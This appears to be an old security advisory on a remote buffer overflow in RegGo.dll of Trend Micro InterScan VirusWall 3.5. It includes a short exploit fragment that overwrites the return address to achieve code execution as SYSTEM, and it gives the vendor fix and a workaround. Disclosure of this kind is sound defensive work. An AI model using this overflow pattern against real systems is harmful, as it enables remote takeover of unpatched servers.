COMMAND

    TrendMicro Interscan VirusWall

SYSTEMS AFFECTED

    TrendMicro Interscan VirusWall

PROBLEM

    Nobuo  Miwa   found  following.    This  is   a  Buffer   Overflow
    vulneravility  in  Trend  Micro  InterScan  VirusWall  for NT 3.5.
    RegGo.dll is the one.

    Following code is a peace of exploit program.

        for ( j=0 ; j<820 ; j++ )
            sploit[j]='a' ;
        sploit[j++]=0xD5 ;
        sploit[j++]=0x63 ;
        sploit[j++]=0xF6 ;
        sploit[j++]=0x77 ;
        sploit[j++]=0xCC ; --> any code will be executed

    There is a same buffer overflow in VirusWall for Japanese.  Any
    code with request will be executed remotely by "SYSTEM".

SOLUTION

    Miwa already reported Trend Micro  support team and they will  fix
    this  issue  in  InterScan  version  3.51  Build  1349.   Users of
    ver.3.51J needs to replace RegGo.dll to fixed version that will be
    included  in   ver.3.52J  or   allow  accesss   80/TCP  to    only
    administrators.

    Fixed RegGo.dll download site:

        http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=2694